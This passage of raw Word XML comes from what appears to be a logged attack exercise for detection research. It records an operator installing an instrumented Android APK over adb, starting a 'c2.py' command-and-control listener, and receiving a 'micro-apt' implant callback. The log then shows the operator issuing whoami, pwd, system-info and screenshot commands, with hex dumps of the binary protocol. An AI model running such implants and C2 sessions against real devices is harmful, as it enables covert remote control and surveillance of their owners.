        <w:t xml:space="preserve">user@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6503FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">appstarter-instr.apk                                                                                                                               100%   83KB  82.8KB/s   00:00   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5681A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB90330" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC3DB4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[user@ta1-clearscope-translate-test ~]$ adb uninstall de.belu.appstarter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E97E035" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43812579" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C877317" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035714EC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb install appstarter-instr.apk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA53DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73000C9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F0E03D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD77215" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kududyn-ProLiant-SL170s-G6:/e5/backup/20190506/projects/micro-apt# python c2.py 8100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26405504" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>waiting for connection on port 8100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0A3593" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>waiting for micro apt (ctrl+c to break from loop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB607F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>connection from (send quit to disconnect micro-apt) ('128.55.12.167', 56340)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715B8396" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x00\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED405EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 00 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F45FCB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680BAA89" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 92 00 00 00 01 00 00 00 00 00 00 00 7A 00 00 00  ............z...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A4807" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 7A 00 00 00 00 00 00 00 6F 73 3A 0A 3D 3D 3D 0A  z.......os:.===.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C9EA7F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000020: 2D 61 6E 64 72 6F 69 64 2D 61 72 6D 36 34 0A 75  -android-arm64.u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4435B538" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000030: 6E 61 6D 65 3A 0A 3D 3D 3D 3D 3D 3D 0A 4C 69 6E  name:.======.Lin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B761031" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000040: 75 78 20 6C 6F 63 61 6C 68 6F 73 74 20 34 2E 34  ux localhost 4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B580263" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000050: 2E 38 38 2D 67 62 34 33 31 30 33 31 37 20 23 31  .88-gb4310317 #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6080F5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000060: 20 53 4D 50 20 50 52 45 45 4D 50 54 20 54 68 75   SMP PREEMPT Thu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43400D8C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000070: 20 41 70 72 20 34 20 31 37 3A 34 30 3A 32 34 20   Apr 4 17:40:24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5485D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000080: 45 44 54 20 32 30 31 39 20 61 61 72 63 68 36 34  EDT 2019 aarch64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F0B47" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000090: 0A 00                                            ..              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248086E6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>'\x92\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00z\x00\x00\x00z\x00\x00\x00\x00\x00\x00\x00os:\n===\n-android-arm64\nuname:\n======\nLinux localhost 4.4.88-gb4310317 #1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019 aarch64\n\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C3F2CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>os:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546AD18" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036B26B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-android-arm64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B83E40" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7738F0F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>======</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8049A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Linux localhost 4.4.88-gb4310317 #1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019 aarch64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A959DE5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D7566C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B4D5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A73EAB6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C00209C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEFC800" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8A534" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46A9CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ED55F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 2D 00 00 00 17 00 00 00 00 00 00 00 15 00 00 00  -...............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23070666" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 15 00 00 00 00 00 00 00 75 69 64 3A 31 30 31 31  ........uid:1011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D3698" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 37 20 65 75 69 64 3A 31 30 31 31 37 00           7 euid:10117.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47744042" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: uid:10117 euid:10117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D1F20D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3FC0E6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED83223" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x14\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770848D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 14 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF8879" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01834322" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1A 00 00 00 15 00 00 00 00 00 00 00 02 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3132B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 02 00 00 00 00 00 00 00 2F 00                    ......../.      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F32BB8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E101AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710A4B82" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFB3E9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;aptinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5CAE3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x00\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716526C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 00 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C8E1B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B34937A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 92 00 00 00 01 00 00 00 00 00 00 00 7A 00 00 00  ............z...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A77D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 7A 00 00 00 00 00 00 00 6F 73 3A 0A 3D 3D 3D 0A  z.......os:.===.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4B972" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000020: 2D 61 6E 64 72 6F 69 64 2D 61 72 6D 36 34 0A 75  -android-arm64.u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AF666" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000030: 6E 61 6D 65 3A 0A 3D 3D 3D 3D 3D 3D 0A 4C 69 6E  name:.======.Lin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277B726F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000040: 75 78 20 6C 6F 63 61 6C 68 6F 73 74 20 34 2E 34  ux localhost 4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E1DBD3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000050: 2E 38 38 2D 67 62 34 33 31 30 33 31 37 20 23 31  .88-gb4310317 #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAFCC8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000060: 20 53 4D 50 20 50 52 45 45 4D 50 54 20 54 68 75   SMP PREEMPT Thu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148030F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000070: 20 41 70 72 20 34 20 31 37 3A 34 30 3A 32 34 20   Apr 4 17:40:24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E24E71" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000080: 45 44 54 20 32 30 31 39 20 61 61 72 63 68 36 34  EDT 2019 aarch64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E80411" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000090: 0A 00                                            ..              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F0D0CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: os:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C870D08" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240BCD77" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-android-arm64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D614BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E66D93" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>======</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01069538" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Linux localhost 4.4.88-gb4310317 #1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019 aarch64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74973FB6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69741610" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F4D3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00"\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2E671" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 22 00 00 00                          ...."...        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F4942" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A1209" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 18 00 00 00 23 00 00 00 00 00 00 00 00 00 00 00  ....#...........</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0212D1CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 00 00 00 00 00 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5365AF" w14:textId="53847B78" w:rsidR="006C14C7" w:rsidRPr="0097593C" w:rsidRDefault="0097593C" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>wrote 0 bytes to screenshot.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A719DF7" w14:textId="6BC26006" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc12600094"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w14:paraId="53C5FAF3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>15:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D391D88" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t>admin@ta51-bg-gen:~/apk$ scp sl* user@128.55.12.114:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432EE1C4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0097593C">
        <w:t xml:space="preserve">user@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
